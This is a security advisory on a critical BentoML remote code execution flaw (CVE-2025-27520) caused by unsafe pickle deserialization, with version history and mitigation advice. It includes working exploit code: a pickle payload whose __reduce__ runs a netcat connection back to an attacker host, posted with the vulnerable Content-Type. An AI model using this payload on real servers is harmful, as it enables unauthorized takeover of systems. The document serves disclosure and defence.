Advisory

Critical Remote Code execution vulnerability reported in BentoML

Take action: The attack is almost trivial, and any platform that uses BentoML exposed on the internet is vulnerable. If you are using BentoML, upgrade it to version 1.4.3 or later immediately. If upgrading isn't possible right away, consider implementing a WAF rule or request processing logic to block requests containing "application/vnd.bentoml+pickle" in the Content-Type header. The workaround may cause other issues, so don't rely on it too much.


Learn More

A critical security vulnerability has been discovered in BentoML, a Python library designed for creating AI application serving systems and model inference. 

The vulnerability is tracked as CVE-2025-27520 (CVSS score 9.8), and allows unauthenticated attackers to execute arbitrary code remotely by sending malicious data payloads to vulnerable servers. The vulnerability stems from an insecure deserialization issue in the deserialize_value() function within the serde.py file. This function processes input data without proper validation, allowing attackers to inject malicious payloads that execute arbitrary code when deserialized:

def deserialize_value(self, payload: Payload) -> t.Any: 
    if "buffer-lengths" not in payload.metadata: 
        return pickle.loads(b"".join(payload.data))

While the initial advisory reported versions 1.3.4 through 1.4.2 as vulnerable, Checkmarx Zero analysts have determined that the vulnerability actually affects versions 1.3.8 through 1.4.2. This discrepancy arose because the vulnerability is a reintroduction of a previously patched issue (CVE-2024-2912):

  • Original vulnerability (CVE-2024-2912) was patched in version 1.2.5
  • The fix was inadvertently removed in version 1.3.8 (commit 045001c3)
  • The same issue resurfaced as CVE-2025-27520
  • Now patched again in version 1.4.3 (fix commit b35f4f4f)

Attackers can exploit this vulnerability by crafting a malicious "pickle" payload containing Python objects with executable code and overriding Python's magic method __reduce__ to execute system commands, finally sending the payload to a vulnerable BentoML server via HTTP request.

Example exploitation code:

import pickle 
import os 
import requests 
 
headers = {'Content-Type': 'application/vnd.bentoml+pickle'} 
 
class Evil: 
   def __reduce__(self): 
       # start a netcat connection back to attacker-controlled host
       return(os.system, ('nc 256.98.36.121 1234',)) 
 
payload = pickle.dumps(Evil()) 
 
# send malicious request to target server running BentoML-based application
requests.post("http://256.98.36.123:3000/summarize",
              data=payload, headers=headers)

If successfully exploited, attackers can execute arbitrary code on the server with the privileges of the running Python application, take control of the affected system and conduct further attacks within the system's connected network and services

The most effective solution is to upgrade to BentoML version 1.4.3 or later, which blocks HTTP requests with the "application/vnd.bentoml+pickle" Content-Type.

If immediate upgrading is not possible, a temporary workaround involves configuring a Web Application Firewall (WAF) to block HTTP requests containing the "application/vnd.bentoml+pickle" Content-Type and serialized data in the request body. This approach may not fully eliminate the risk and should be thoroughly tested to avoid blocking legitimate application traffic.

Critical Remote Code execution vulnerability reported in BentoML